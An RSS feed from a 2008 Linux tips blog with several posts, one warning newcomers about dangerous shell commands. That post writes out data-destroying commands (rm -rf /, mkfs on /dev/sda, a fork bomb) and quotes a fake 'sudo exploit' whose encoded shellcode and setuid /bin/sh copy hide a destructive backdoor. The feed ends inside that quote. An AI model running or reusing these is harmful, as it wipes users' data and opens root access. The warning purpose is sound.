<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="http://feeds.feedburner.com/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Quick Tweaks</title>
	
	<link>http://www.quicktweaks.com</link>
	<description>Quick Tweaks For Your System</description>
	<pubDate>Sat, 01 Nov 2008 07:06:44 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
	<language>en</language>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/quicktweaks/myFe" type="application/rss+xml" /><item>
		<title>Fun with Linux Commands-III - Being productive</title>
		<link>http://feeds.feedburner.com/~r/quicktweaks/myFe/~3/438815403/</link>
		<comments>http://www.quicktweaks.com/2008/11/01/fun-with-linux-commands-iii-being-productive/#comments</comments>
		<pubDate>Sat, 01 Nov 2008 07:06:44 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<category><![CDATA[TerminalFunFive]]></category>

		<category><![CDATA[bash]]></category>

		<category><![CDATA[command]]></category>

		<category><![CDATA[script]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=252</guid>
		<description><![CDATA[Who says Linux commands are just for geek people? And who says it is just a fun toy? Linux is simple yet productive, the only limitation is your imagination.


Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/24/fun-with-linux-commands-ii-with-power-comes-responsibility/' rel='bookmark' title='Permanent Link: Fun with Linux Commands-II - With Power Comes Responsibility'>Fun with Linux Commands-II - With Power Comes Responsibility</a> <small>Happy Linux Commanding! But be careful! The heading is self-explanatory....</small></li><li><a href='http://www.quicktweaks.com/2008/10/17/fun-with-linux-commands-i/' rel='bookmark' title='Permanent Link: Fun with Linux Commands-I'>Fun with Linux Commands-I</a> <small>Happy Linux Commanding! From now onwards I will be posting...</small></li><li><a href='http://www.quicktweaks.com/2008/08/26/analyze-and-visualize-your-gmail-ing-trends/' rel='bookmark' title='Permanent Link: Analyze and visualize your Gmail-ing trends'>Analyze and visualize your Gmail-ing trends</a> <small>Want to know who sends you the emails most often,...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Happy Linux commanding!</p>
<p>Who says Linux commands are just for geek people? And who says it is just a fun toy? Linux is simple yet productive, the only limitation is your imagination. Those who argue me with me for Linux being simple, here is a popular saying:</p>
<blockquote><p>*NIX is basically a simple operating system, but you have to be a genius to understand the simplicity</p></blockquote>
<p><span id="more-252"></span></p>
<p>In this post, we will talk about few commands and write a couple of scripts (don&#8217;t worry, it will be damn simple). Some guys might blame that these commands/ scripts have no use and might shout &#8220;why the hell do we need that.&#8221; Remember, these are just the tools. It&#8217;s upto you how well you use these tools for your tasks. Also remember, one who discovers the alternative uses of a tool is often called a Genious. Let&#8217;s get started:</p>
<p style="text-align: center;"></p>
<p>1. Make Linux speak that he loves himself.</p>
<p><code>espeak "I Love Linux"</code></p>
<p>Now you should be asking why the hell I need that? Well, what about you have a document, or a story and someone in your family is blind, or can&#8217;t see nicely. You don&#8217;t have enough time reading the document for him/ her. Ask him to sit in front of a computer and run this: espeak &lt; documentName</p>
<p>We have more to do with <em>espeak</em>, you can even output the file to a .wav file or a .ogg file so that you can record them in a CD and mail to someone you care!</p>
<p>Still not impressed? What about making it to read your email, or run it in the background so that it alerts you whenever a new mail arrives in your Inbox and then reads the sender&#8217;s name, and subject. Also, if you are little ambitious, you can even make it say the weather, if the weather changes drastically. I won&#8217;t discuss how to make it read your mails, or weather; I&#8217;m just talking about possibility. When I get some time, I&#8217;m thinking to write a script which reads my Gmails. Just keep coming back!</p>
<p>2. Making your own commands.</p>
<p>You have heard Linux is highly customizable. How about writing your own simple command. We will write a small script which allows you a convenient way to change the directories, actually to go back several levels up. Let&#8217;s suppose you are inside <em>/home/yourhome/a/b/c/d/e/f/g/h/i/j</em> directory. You want to change the directory (cd) to several levels up. You can easily do this with somthing like <em>cd ../../../../..</em> But what about something as similar as up 3 which will take you 3 levels up</p>
<p>Fireup your favorite text editor and type the following (don&#8217;t be intimated by thinking that you are programming something, I will explain this script line by line, don&#8217;w worry!):</p>
<p><code>#!/bin/bash<br />
LEVEL=$1<br />
for ((i = 1; i &lt;= LEVEL; i++))<br />
do<br />
CDIR=../$CDIR<br />
done<br />
cd $CDIR<br />
echo "You are in: "$PWD<br />
exec /bin/bash</code></p>
<p>Save the file as up and issue following two commands:</p>
<p><code>$ chmod 755 ./up</code></p>
<p>$ sudo cp up /usr/bin</p>
<p>Now, from your home directory try using this command:<br />
<code><br />
$ up 2</code></p>
<p>Where are you at? At root directory! See how easy it was? Let&#8217;s see how our little script chef made pizza for us:</p>
<p><code>#! /bin/bash</code> -&gt; you are using bash script</p>
<p><code>LEVEL=$1</code> -&gt; $1 is the first parameter passed to this script assigned to LEVEL</p>
<p><code>for ((i = 1; i &lt;= LEVEL; i++))</code> -&gt; for some times (upto LEVEL)&#8230;<br />
<code>do </code> -&gt; &#8230;we will go round&#8230;<br />
<code>CDIR=../$CDIR </code> -&gt; &#8230;creating our path and assigning it to CDIR and&#8230;<br />
<code>done</code> -&gt; &#8230;when we are done&#8230;<br />
<code>cd $CDIR</code> -&gt; &#8230;we will change our directory to the path we have created above and&#8230;<br />
<code>echo "You are in: "$PWD </code> -&gt; &#8230;we will let you know where you are and finally&#8230;<br />
<code>exec /bin/bash</code> -&gt; &#8230;we are done so let&#8217;s get a new shell</p>
<p>That&#8217;s was not to easy but wasn&#8217;t too hard either. It is not too hard to ease your repetitive tasks with a single file and increase your productivity.</p>
<p>Let&#8217;s make another little script&#8230;</p>
<p>3. What do you usually do changing a directory? List it contents right? How about this little script?</p>
<p><code>#!/bin/bash</code></p>
<p>cd $1</p>
<p>ls</p>
<p>exec /bin/bash</p>
<p>That&#8217;s it! Save it as <em>cdls</em> or something like that and then issue this command:<br />
<code>$ chmod 755 &amp; sudo cp cdls /usr/bin</code></p>
<p>For Ubuntu users, if you want a script that keeps track of all your &#8220;apt-get&#8221; activities by posting them to your Twitter account,<a title="tapt" href="http://www.quicktweaks.com/tapt/"  target="_blank"> try this little handy script</a>.</p>
<p>4. One more thing about <em>cd</em>. Which is the fastest and easiest cd command that take you to your home directory? <strong><em>cd /home/yourhome </em></strong>? <em><strong>cd ~</strong></em> ? <em><strong>cd</strong></em> itself!</p>
<p><code>$ cd</code></p>
<p>It takes you to your home directory</p>
<p>5. Tired of typing clear to clear your screen? Press <code>ctrl + l</code></p>
<p>That&#8217;s it for today. Happy Halloween!</p>
<p style="text-align: center;"></p>
<p><map name='google_ad_map_252_4dd546a088e8e37f'>
<area shape='rect' href='http://imageads.googleadservices.com/pagead/imgclick/252?pos=0' coords='1,2,367,28' />
<area shape='rect' href='http://services.google.com/feedback/abg' coords='384,10,453,23'/></map>
<img usemap='#google_ad_map_252_4dd546a088e8e37f' border='0' src='http://imageads.googleadservices.com/pagead/ads?format=468x30_aff_img&amp;client=&amp;channel=&amp;output=png&amp;cuid=252&amp;url= http%3A%2F%2Fwww.quicktweaks.com%2F2008%2F11%2F01%2Ffun-with-linux-commands-iii-being-productive%2F' /></p>

<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/24/fun-with-linux-commands-ii-with-power-comes-responsibility/' rel='bookmark' title='Permanent Link: Fun with Linux Commands-II - With Power Comes Responsibility'>Fun with Linux Commands-II - With Power Comes Responsibility</a> <small>Happy Linux Commanding! But be careful! The heading is self-explanatory....</small></li><li><a href='http://www.quicktweaks.com/2008/10/17/fun-with-linux-commands-i/' rel='bookmark' title='Permanent Link: Fun with Linux Commands-I'>Fun with Linux Commands-I</a> <small>Happy Linux Commanding! From now onwards I will be posting...</small></li><li><a href='http://www.quicktweaks.com/2008/08/26/analyze-and-visualize-your-gmail-ing-trends/' rel='bookmark' title='Permanent Link: Analyze and visualize your Gmail-ing trends'>Analyze and visualize your Gmail-ing trends</a> <small>Want to know who sends you the emails most often,...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>
<p><a href="http://feeds.feedburner.com/~a/quicktweaks/myFe?a=Kx6LM8"><img src="http://feeds.feedburner.com/~a/quicktweaks/myFe?i=Kx6LM8" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=vriNN"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=vriNN" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=qzVun"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=qzVun" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=VnQ0N"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=VnQ0N" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=Vj91n"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=Vj91n" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/11/01/fun-with-linux-commands-iii-being-productive/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.quicktweaks.com/2008/11/01/fun-with-linux-commands-iii-being-productive/</feedburner:origLink></item>
		<item>
		<title>CODEWEAVERS WILL BE GIVING AWAY CROSSOVER FOR FREE FOR ONE DAY</title>
		<link>http://feeds.feedburner.com/~r/quicktweaks/myFe/~3/434234953/</link>
		<comments>http://www.quicktweaks.com/2008/10/27/codeweavers-will-be-giving-away-crossover-for-free-for-one-day/#comments</comments>
		<pubDate>Tue, 28 Oct 2008 02:13:21 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
		
		<category><![CDATA[Installation]]></category>

		<category><![CDATA[Linux]]></category>

		<category><![CDATA[Software]]></category>

		<category><![CDATA[Codeweaver]]></category>

		<category><![CDATA[crossover]]></category>

		<category><![CDATA[download]]></category>

		<category><![CDATA[FREE]]></category>

		<category><![CDATA[George Bush]]></category>

		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Wine]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=250</guid>
		<description><![CDATA[Codeweaver, the maker of crossover software which allows you to run Windows applications in Linux &#38; MacOS with the help of Wine, will be giving away its award wining software for free for one day.

Tomorrow, October 28, will be a day of joy for the Linux users who are looking to run some of the [...]


Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/13/open-office-30-final-officially-announced-expect-a-record-download/' rel='bookmark' title='Permanent Link: Open Office 3.0 final officially announced; expect a record downloads'>Open Office 3.0 final officially announced; expect a record downloads</a> <small>The packages were already started showing up a couple of...</small></li><li><a href='http://www.quicktweaks.com/2008/10/01/power-of-wonderful-linux-terminal-10-challenges-for-windows-users/' rel='bookmark' title='Permanent Link: Power of Wonderful Linux Terminal - 10 Challenges for Windows Users'>Power of Wonderful Linux Terminal - 10 Challenges for Windows Users</a> <small>Enough said about Linux being free. You shouldn’t use anything...</small></li><li><a href='http://www.quicktweaks.com/2008/04/07/install-bulky-linux-distribution-without-burning-a-cd/' rel='bookmark' title='Permanent Link: Install Bulky Linux Distribution Without Burning a CD'>Install Bulky Linux Distribution Without Burning a CD</a> <small>This tutorial is about installing Fedora Linux without burning a...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Codeweaver, the maker of crossover software which allows you to run Windows applications in Linux &amp; MacOS with the help of Wine, will be <a href="http://www.codeweavers.com/about/general/press/20081027/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.codeweavers.com');" target="_blank">giving away its award wining software for free for one day</a>.</p>
<p><span id="more-250"></span></p>
<p>Tomorrow, October 28, will be a day of joy for the Linux users who are looking to run some of the Windows Applications with Wine. Don&#8217;t forget to visit <a href="http://www.codeweavers.com/about/general/press/20081027/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.codeweavers.com');" target="_blank">Codeweaver&#8217;s home page</a> at least once tomorrow as they will give you a deal code which will allow you to download and use Crossover for free for your whole life. This will be a full version and will come with technical support. Did you bookmarked the site?</p>
<p>BTW, don&#8217;t forget to thanks George Bush for this. An excerpt from their press release:</p>
<blockquote><p>&#8220;I launched the campaign to inspire President Bush to make the most of his final days in office. Who knew that our Challenge would have this kind of impact on the country?&#8221; White said. &#8220;On the other hand, who knew that the economy would implode, causing oil demand to drop into the abyss and gas prices to plummet as well. Clearly, investigating Bear Stearns, AIG and those guys is misplaced – CodeWeavers is responsible for this mess. So it&#8217;s free software for all!&#8221;</p></blockquote>
<p><map name='google_ad_map_250_4dd546a088e8e37f'>
<area shape='rect' href='http://imageads.googleadservices.com/pagead/imgclick/250?pos=0' coords='1,2,367,28' />
<area shape='rect' href='http://services.google.com/feedback/abg' coords='384,10,453,23'/></map>
<img usemap='#google_ad_map_250_4dd546a088e8e37f' border='0' src='http://imageads.googleadservices.com/pagead/ads?format=468x30_aff_img&amp;client=&amp;channel=&amp;output=png&amp;cuid=250&amp;url= http%3A%2F%2Fwww.quicktweaks.com%2F2008%2F10%2F27%2Fcodeweavers-will-be-giving-away-crossover-for-free-for-one-day%2F' /></p>

<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/13/open-office-30-final-officially-announced-expect-a-record-download/' rel='bookmark' title='Permanent Link: Open Office 3.0 final officially announced; expect a record downloads'>Open Office 3.0 final officially announced; expect a record downloads</a> <small>The packages were already started showing up a couple of...</small></li><li><a href='http://www.quicktweaks.com/2008/10/01/power-of-wonderful-linux-terminal-10-challenges-for-windows-users/' rel='bookmark' title='Permanent Link: Power of Wonderful Linux Terminal - 10 Challenges for Windows Users'>Power of Wonderful Linux Terminal - 10 Challenges for Windows Users</a> <small>Enough said about Linux being free. You shouldn’t use anything...</small></li><li><a href='http://www.quicktweaks.com/2008/04/07/install-bulky-linux-distribution-without-burning-a-cd/' rel='bookmark' title='Permanent Link: Install Bulky Linux Distribution Without Burning a CD'>Install Bulky Linux Distribution Without Burning a CD</a> <small>This tutorial is about installing Fedora Linux without burning a...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>
<p><a href="http://feeds.feedburner.com/~a/quicktweaks/myFe?a=6Hpm7I"><img src="http://feeds.feedburner.com/~a/quicktweaks/myFe?i=6Hpm7I" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=ZH6RM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=ZH6RM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=MIaem"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=MIaem" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=XyiqM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=XyiqM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=zpAXm"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=zpAXm" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/27/codeweavers-will-be-giving-away-crossover-for-free-for-one-day/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.quicktweaks.com/2008/10/27/codeweavers-will-be-giving-away-crossover-for-free-for-one-day/</feedburner:origLink></item>
		<item>
		<title>Linux Talks: They talked about Linux</title>
		<link>http://feeds.feedburner.com/~r/quicktweaks/myFe/~3/431430126/</link>
		<comments>http://www.quicktweaks.com/2008/10/24/linux-talks-they-talked-about-linux-2/#comments</comments>
		<pubDate>Sat, 25 Oct 2008 05:53:42 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
		
		<category><![CDATA[Linux Talks]]></category>

		<category><![CDATA[Linux]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=246</guid>
		<description><![CDATA[Some links for this weekend:

5 Wallpaper Changer Apps For Linux
Kubuntu 8.10 &#8216;Intrepid Ibex&#8217; Beta Screenshots Tour
WINE Developers Start On Direct3D 10 Support
Dell first ad - All About Ubuntu Linux
Fedora 10 - A Detailed Discussion on 13 Prime Features
Linux Foundation values Linux at $10.8 billion, kernel at $1.4 billion
Mac OS is better than Ubuntu Linux: A [...]


Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/17/linux-talks-they-talked-about-linux/' rel='bookmark' title='Permanent Link: Linux Talks: They talked about Linux'>Linux Talks: They talked about Linux</a> <small>Hey Tux lovers, here are some good articles: Advanced Tips...</small></li><li><a href='http://www.quicktweaks.com/2008/04/07/install-bulky-linux-distribution-without-burning-a-cd/' rel='bookmark' title='Permanent Link: Install Bulky Linux Distribution Without Burning a CD'>Install Bulky Linux Distribution Without Burning a CD</a> <small>This tutorial is about installing Fedora Linux without burning a...</small></li><li><a href='http://www.quicktweaks.com/2008/10/12/switch-to-linux-today-bsod-linux-flier/' rel='bookmark' title='Permanent Link: Switch to Linux Today! bsod Linux Flier'>Switch to Linux Today! bsod Linux Flier</a> <small>There are many reasons to switch to Linux, but this...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Some links for this weekend:</p>
<ul>
<li><a href="http://www.makeuseof.com/tag/5-wallpaper-changer-apps-for-linux/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.makeuseof.com');" target="_blank">5 Wallpaper Changer Apps For Linux</a></li>
<li><a href="http://tuxarena.blogspot.com/2008/10/kubuntu-810-intrepid-ibex-beta.html" onclick="javascript:pageTracker._trackPageview('/outbound/article/tuxarena.blogspot.com');" target="_blank">Kubuntu 8.10 &#8216;Intrepid Ibex&#8217; Beta Screenshots Tour</a></li>
<li><a href="http://www.phoronix.com/scan.php?page=news_item&amp;px=NjgxMA" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.phoronix.com');" target="_blank">WINE Developers Start On Direct3D 10 Support</a></li>
<li><a href="http://www.tribbleagency.com/?p=2827" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.tribbleagency.com');" target="_blank">Dell first ad - All About Ubuntu Linux</a></li>
<li><a href="http://blog.taragana.com/index.php/archive/fedora-10-a-detailed-discussion-on-the-features/" onclick="javascript:pageTracker._trackPageview('/outbound/article/blog.taragana.com');" target="_blank">Fedora 10 - A Detailed Discussion on 13 Prime Features</a></li>
<li><a href="http://www.tgdaily.com/content/view/39881/118/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.tgdaily.com');" target="_blank">Linux Foundation values Linux at $10.8 billion, kernel at $1.4 billion</a></li>
<li><a href="http://prosenjit23.wordpress.com/2008/10/21/ubuntu-vs-mac-os-truths-and-myths/" onclick="javascript:pageTracker._trackPageview('/outbound/article/prosenjit23.wordpress.com');" target="_blank">Mac OS is better than Ubuntu Linux: A myth</a></li>
<li><a href="http://helpforlinux.blogspot.com/2008/10/5-gmail-notifiers-for-linux.html" onclick="javascript:pageTracker._trackPageview('/outbound/article/helpforlinux.blogspot.com');" target="_blank">5 Gmail Notifiers For Linux</a></li>
<li><a href="http://www.tectonic.co.za/?p=3447" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.tectonic.co.za');" target="_blank">Ubuntu explains OpenOffice.org 3.0 decision </a></li>
<li><a href="http://www.ubuntukungfu.org/blog/2008/09/9-tips-for-ubuntu-notebook-users/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.ubuntukungfu.org');" target="_blank">9 tips for Ubuntu notebook users</a></li>
</ul>
<p><map name='google_ad_map_246_4dd546a088e8e37f'>
<area shape='rect' href='http://imageads.googleadservices.com/pagead/imgclick/246?pos=0' coords='1,2,367,28' />
<area shape='rect' href='http://services.google.com/feedback/abg' coords='384,10,453,23'/></map>
<img usemap='#google_ad_map_246_4dd546a088e8e37f' border='0' src='http://imageads.googleadservices.com/pagead/ads?format=468x30_aff_img&amp;client=&amp;channel=&amp;output=png&amp;cuid=246&amp;url= http%3A%2F%2Fwww.quicktweaks.com%2F2008%2F10%2F24%2Flinux-talks-they-talked-about-linux-2%2F' /></p>

<p>Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/10/17/linux-talks-they-talked-about-linux/' rel='bookmark' title='Permanent Link: Linux Talks: They talked about Linux'>Linux Talks: They talked about Linux</a> <small>Hey Tux lovers, here are some good articles: Advanced Tips...</small></li><li><a href='http://www.quicktweaks.com/2008/04/07/install-bulky-linux-distribution-without-burning-a-cd/' rel='bookmark' title='Permanent Link: Install Bulky Linux Distribution Without Burning a CD'>Install Bulky Linux Distribution Without Burning a CD</a> <small>This tutorial is about installing Fedora Linux without burning a...</small></li><li><a href='http://www.quicktweaks.com/2008/10/12/switch-to-linux-today-bsod-linux-flier/' rel='bookmark' title='Permanent Link: Switch to Linux Today! bsod Linux Flier'>Switch to Linux Today! bsod Linux Flier</a> <small>There are many reasons to switch to Linux, but this...</small></li></ol></p>
<p>Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.</p>
<p><a href="http://feeds.feedburner.com/~a/quicktweaks/myFe?a=wI8eCN"><img src="http://feeds.feedburner.com/~a/quicktweaks/myFe?i=wI8eCN" border="0"></img></a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=Y3eRM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=Y3eRM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=lJf4m"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=lJf4m" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=qcZKM"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=qcZKM" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/quicktweaks/myFe?a=nxygm"><img src="http://feeds.feedburner.com/~f/quicktweaks/myFe?i=nxygm" border="0"></img></a>
</div>]]></content:encoded>
			<wfw:commentRss>http://www.quicktweaks.com/2008/10/24/linux-talks-they-talked-about-linux-2/feed/</wfw:commentRss>
		<feedburner:origLink>http://www.quicktweaks.com/2008/10/24/linux-talks-they-talked-about-linux-2/</feedburner:origLink></item>
		<item>
		<title>Fun with Linux Commands-II - With Power Comes Responsibility</title>
		<link>http://feeds.feedburner.com/~r/quicktweaks/myFe/~3/431321938/</link>
		<comments>http://www.quicktweaks.com/2008/10/24/fun-with-linux-commands-ii-with-power-comes-responsibility/#comments</comments>
		<pubDate>Sat, 25 Oct 2008 02:43:04 +0000</pubDate>
		<dc:creator>ashokgelal</dc:creator>
		
		<category><![CDATA[TerminalFunFive]]></category>

		<category><![CDATA[commands]]></category>

		<category><![CDATA[Linux]]></category>

		<category><![CDATA[Terminal]]></category>

		<guid isPermaLink="false">http://www.quicktweaks.com/?p=244</guid>
		<description><![CDATA[Happy Linux Commanding! But be careful!
The heading is self-explanatory. Linux Terminal seems dump but nothing is more clever than it. Linux is powerful and fun. When it is about something&#8217;s strength remember what Uncle Ben said.
When you are new to Linux you often seek to get help from others and almost most of the advices [...]


Related posts:<ol><li><a href='http://www.quicktweaks.com/2008/11/01/fun-with-linux-commands-iii-being-productive/' rel='bookmark' title='Permanent Link: Fun with Linux Commands-III - Being productive'>Fun with Linux Commands-III - Being productive</a> <small>Happy Linux commanding! Who says Linux commands are just for...</small></li><li><a href='http://www.quicktweaks.com/2008/10/17/fun-with-linux-commands-i/' rel='bookmark' title='Permanent Link: Fun with Linux Commands-I'>Fun with Linux Commands-I</a> <small>Happy Linux Commanding! From now onwards I will be posting...</small></li><li><a href='http://www.quicktweaks.com/2008/10/01/power-of-wonderful-linux-terminal-10-challenges-for-windows-users/' rel='bookmark' title='Permanent Link: Power of Wonderful Linux Terminal - 10 Challenges for Windows Users'>Power of Wonderful Linux Terminal - 10 Challenges for Windows Users</a> <small>Enough said about Linux being free. You shouldn’t use anything...</small></li></ol>

Related posts brought to you by <a href='http://mitcho.com/code/yarpp/'>Yet Another Related Posts Plugin</a>.]]></description>
			<content:encoded><![CDATA[<p>Happy Linux Commanding! But be careful!</p>
<p>The heading is self-explanatory. Linux Terminal seems dump but nothing is more clever than it. Linux is powerful and fun. When it is about something&#8217;s strength remember what <a title="Uncle Ben says Linux is powerful ;-)" href="http://www.imdb.com/title/tt0145487/quotes" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.imdb.com');" target="_blank">Uncle Ben said</a>.</p>
<p>When you are new to Linux you often seek to get help from others and almost most of the advices you get will be in the form of some commands such as<code> ps, top, modprobe, lspci</code> etc. Be careful when you run these commands as some <a title="Harmful tips for Linux" href="http://linsux.org/index.php?topic=96.0" onclick="javascript:pageTracker._trackPageview('/outbound/article/linsux.org');" target="_blank">Anti-Linux a**holes try to fool new Linux users in the name of tips and tutorials</a>.If after following such command(s), you lose all your files, no one is to be blamed but you.</p>
<p><span id="more-244"></span></p>
<p>If you want save yourself, here is one principle: Be aware of what you are doing! Just don&#8217;t do what someone suggest you. Fireup <em>man</em> page, look what the command is about. This way you can learn a couple of more options too. If you are in doubt about the commands, go to a couple of forums and put all information you have such as: <strong>Hello I was trying to do this, and a guy from <em>forum.xyz.com</em> suggest me to issue this command. I suspect this is a harmful command. Any suggestions?</strong> Take my words, Linux carries a strong spirit with it - spirit to share knowledge. And you will get some good explanatory suggestions very quickly. If you are still in doubt, I suggest you to issue the commands inside virtual OS:</p>
<p style="text-align: center;"></p>
<p>Last thing first. Today I will be posting some harmful Linux commands. DO NOT ISSUE THESE COMMANDS! These commands are just for your information. These commands are not made for making harm to your computer, but with a couple of options it can be very dangerous. After all Linux doesn&#8217;t know that a folder inside your home directory contains your first girlfriend&#8217;s picture! It is your duty to ensure they are safe. Let&#8217;s get started. I repeat <strong>DON&#8217;T ISSUE THESE COMMANDS</strong>. If you want to test, I suggest you to run them inside a virtual Linux OS.</p>
<p>1. The king of all devils:</p>
<p><code>rm -rf /</code></p>
<p>Q. What does <em>rm</em> do?</p>
<p>A. Removes a file</p>
<p>Q. What is <em>r</em>?</p>
<p>A. Recursion. That means inside a folder, of a folder, of a folder and so on</p>
<p>Q. what is <em>f</em>?</p>
<p>A. Force. It means you are saying to the command<em> &#8220;Never ask me anything. Just do what you want to do&#8221;</em></p>
<p>Q. What is <em>/</em></p>
<p>A. Your <em>ROOT</em> directory!</p>
<p>See what it does? <em>Recursively removes all the files inside your root directory without nagging you - &#8220;Should I delete this?&#8221;<br />
</em><br />
There are various versions of <em>rm</em> available such as:</p>
<p><em>rm -rf .<br />
rm -rf *</em></p>
<p>Not only someone from outside, you yourself can screw up things sometimes. Little knowledge is dangerous! How about this - you want to delete all the hidden files inside a directory. That&#8217;s easy right? Hidden files are denoted with <strong>.</strong> in front so you might be thinking this command <strong><code>rm - .*</code></strong> Nooooooooooo!!! It will delete all the files one level up of the current directory.</p>
<p>2. How about backing up your home directory or some folders? Never try to do anything such as:</p>
<p><code>mv /home/yourhomedirectory/* /dev/null</code></p>
<p>Q. What is <em>mv</em>?</p>
<p>A. Move files</p>
<p>Q. What is <em>dev/null</em>?</p>
<p>A. Null means nothing. In other words, it is a black-hole.</p>
<p>If you issue above command, it will move all the files inside your home directory to a blackhole.</p>
<p>3. Linux Terminal is not a toy to play, it&#8217;s something to learn and do some productive things. I just mean to warn you don&#8217;t type anything silly and hit enter such as this:</p>
<p><code>:(){:|:&amp;};:</code></p>
<p>Those seem like emoticons but they are actually shell programming stuffs and have special meaning. The above command executes different process freezing your computer and you will get a BSOD, a sort of! <img src='http://www.quicktweaks.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<p>4. How about making a Linux filesystem?</p>
<p><code>mkfs.ext3 /dev/sda</code></p>
<p>You hard disk&#8217;s data are gone, and will never come back again. That was a poor farewell party for your documents.</p>
<p>5. Do you know eyes and your knowledge both can lie? Well sometimes. What do you see in the following C file written by someone claiming <a title="sudo off-by-one poc exploit" href="http://seclists.org/fulldisclosure/2007/Aug/0071.html" onclick="javascript:pageTracker._trackPageview('/outbound/article/seclists.org');" target="_blank">New sudo off-by-one poc exploit</a>? Any sign of devil?</p>
<blockquote><p><code>...</code></p>
<p>char esp[] __attribute__ ((section(&#8221;.text&#8221;))) /* e.s.p<br />
release */<br />
= &#8220;\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68&#8243;<br />
&#8220;\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99&#8243;<br />
&#8220;\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7&#8243;<br />
&#8220;\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56&#8243;<br />
&#8220;\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31&#8243;<br />
&#8220;\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69&#8243;<br />
&#8220;\x6e\x2f\x73\x68\x00\x2d\x63\x00&#8243;<br />
&#8220;cp -p /bin/sh /tmp/.beyond; chmod 4755<br />
/tmp/.beyond;&#8221;;</p>
<p>&#8230;</p></blockquote>
